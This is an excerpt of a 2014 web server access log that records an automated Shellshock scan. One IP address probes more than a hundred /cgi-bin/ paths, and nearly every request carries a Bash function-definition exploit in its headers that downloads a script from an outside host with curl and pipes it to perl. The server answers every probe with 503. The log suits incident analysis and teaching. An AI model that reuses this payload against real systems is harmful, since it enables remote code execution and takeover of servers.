http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:23 +0200] "GET /cgi-bin/hsx.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:24 +0200] "GET /cgi-bin/hitview.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:24 +0200] "GET /cgi-bin/handler/netsonarHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:25 +0200] "GET /cgi-bin/handler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:25 +0200] "GET /cgi-bin/handlerHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:25 +0200] "GET /cgi-bin/guestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:26 +0200] "GET /cgi-bin/gm.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:26 +0200] "GET /cgi-bin/gm-cplog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:27 +0200] "GET /cgi-bin/gm-authors.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:27 +0200] "GET /cgi-bin/gH.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:27 +0200] "GET /cgi-bin/getdoc.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:28 +0200] "GET /cgi-bin/generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:28 +0200] "GET /cgi-bin/gbook/gbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:29 +0200] "GET /cgi-bin/gbadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:29 +0200] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:29 +0200] "GET /cgi-bin/FormHandler.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:30 +0200] "GET /cgi-bin/fom/fom.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:30 +0200] "GET /cgi-bin/fom.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:31 +0200] "GET /cgi-bin/flexform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:32 +0200] "GET /cgi-bin/FileSeek2.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:32 +0200] "GET /cgi-bin/FileSeek.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:33 +0200] "GET /cgi-bin/faqmanager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:33 +0200] "GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:34 +0200] "GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:34 +0200] "GET /cgi-bin/ezshopper/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:34 +0200] "GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:36 +0200] "GET /cgi-bin/ezboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:36 +0200] "GET /cgi-bin/ezadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:37 +0200] "GET /cgi-bin/environ.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:37 +0200] "GET /cgi-bin/enter.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:38 +0200] "GET /cgi-bin/emumail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:38 +0200] "GET /cgi-bin/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:38 +0200] "GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:39 +0200] "GET /cgi-bin/download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:39 +0200] "GET /cgi-bin/directorypro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:40 +0200] "GET /cgi-bin/dig.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:40 +0200] "GET /cgi-bin/diagnose.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:40 +0200] "GET /cgi-bin/dfire.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:41 +0200] "GET /cgi-bin/dcforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:41 +0200] "GET /cgi-bin/dbman/db.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:42 +0200] "GET /cgi-bin/db_manager.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:42 +0200] "GET /cgi-bin/day5datanotifier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:42 +0200] "GET /cgi-bin/day5datacopier.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:44 +0200] "GET /cgi-bin/cvsquery.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:44 +0200] "GET /cgi-bin/cvslog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:45 +0200] "GET /cgi-bin/cvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:46 +0200] "GET /cgi-bin/csSearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:46 +0200] "GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:47 +0200] "GET /cgi-bin/csPassword.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:47 +0200] "GET /cgi-bin/csNewsPro.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:49 +0200] "GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:49 +0200] "GET /cgi-bin/CSMailto.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:49 +0200] "GET /cgi-bin/csLiveSupport.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:50 +0200] "GET /cgi-bin/csGuestBook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:50 +0200] "GET /cgi-bin/csChatRBox.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:51 +0200] "GET /cgi-bin/Count.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:51 +0200] "GET /cgi-bin/compatible.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:52 +0200] "GET /cgi-bin/common/listrec.plHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:52 +0200] "GET /cgi-bin/commerce.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:52 +0200] "GET /cgi-bin/commandit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:54 +0200] "GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:54 +0200] "GET /cgi-bin/classifieds.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:55 +0200] "GET /cgi-bin/classified.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:55 +0200] "GET /cgi-bin/cgi_processHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:55 +0200] "GET /cgi-bin/cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:56 +0200] "GET /cgi-bin/cgforum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:56 +0200] "GET /cgi-bin/ccvsblame.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:57 +0200] "GET /cgi-bin/cbmc/forums.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:58 +0200] "GET /cgi-bin/calendar/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:58 +0200] "GET /cgi-bin/cachemgr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:59 +0200] "GET /cgi-bin/cached_feed.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:59 +0200] "GET /cgi-bin/c_download.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:00 +0200] "GET /cgi-bin/bulk/bulk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:00 +0200] "GET /cgi-bin/build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:02 +0200] "GET /cgi-bin/bsguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:01 +0200] "GET /cgi-bin/bslist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:03 +0200] "GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:06 +0200] "GET /cgi-bin/bnbform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:05 +0200] "GET /cgi-bin/book.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:06 +0200] "GET /cgi-bin/blog/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:08 +0200] "GET /cgi-bin/blog/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:10 +0200] "GET /cgi-bin/bigconf.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:11 +0200] "GET /cgi-bin/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:15 +0200] "GET /cgi-bin/bb-rep.shHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:25:12 +0200] "GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:13 +0200] "GET /cgi-bin/bb-replog.shHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:25:15 +0200] "GET /cgi-bin/bb-hostsvc.shHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:25:17 +0200] "GET /cgi-bin/bb-histlog.shHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:25:18 +0200] "GET /cgi-bin/bb-hist.shHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:25:21 +0200] "GET /cgi-bin/banner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:19 +0200] "GET /cgi-bin/bannereditor.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:23 +0200] "GET /cgi-bin/axs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:21 +0200] "GET /cgi-bin/badmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:24 +0200] "GET /cgi-bin/ax.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +220.181.108.150 - - [31/Oct/2014:01:25:27 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.172.64.22 - - [31/Oct/2014:01:25:25 +0200] "GET /cgi-bin/ax-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:26 +0200] "GET /cgi-bin/auktion.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:27 +0200] "GET /cgi-bin/auction/auction.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:28 +0200] "GET /cgi-bin/AT-generate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:29 +0200] "GET /cgi-bin/AT-admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:31 +0200] "GET /cgi-bin/architext_query.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:32 +0200] "GET /cgi-bin/AnyBoard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +123.125.71.76 - - [31/Oct/2014:01:25:34 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +66.172.64.22 - - [31/Oct/2014:01:25:34 +0200] "GET /cgi-bin/alienform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:35 +0200] "GET /cgi-bin/aglimpse.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:38 +0200] "GET /cgi-bin/adminhot.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:37 +0200] "GET /cgi-bin/adminwww.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:42 +0200] "GET /cgi-bin/admin.plHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:25:39 +0200] "GET /cgi-bin/admin/setup.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:41 +0200] "GET /cgi-bin/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:43 +0200] "GET /cgi-bin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:44 +0200] "GET /cgi-bin/adduser.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:45 +0200] "GET /cgi-bin/addbanner.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:46 +0200] "GET /cgi-bin/add_ftp.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:47 +0200] "GET /cgi-bin/a1stats/a1disp4.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:48 +0200] "GET /cgi-bin/a1stats/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:49 +0200] "GET /cgi-bin/a1disp3.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:50 +0200] "GET /cgi-bin/14all.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:51 +0200] "GET /cgi-bin/14all-1.1.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:52 +0200] "GET /cgi-bin/.namazu.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:54 +0200] "GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:53 +0200] "GET 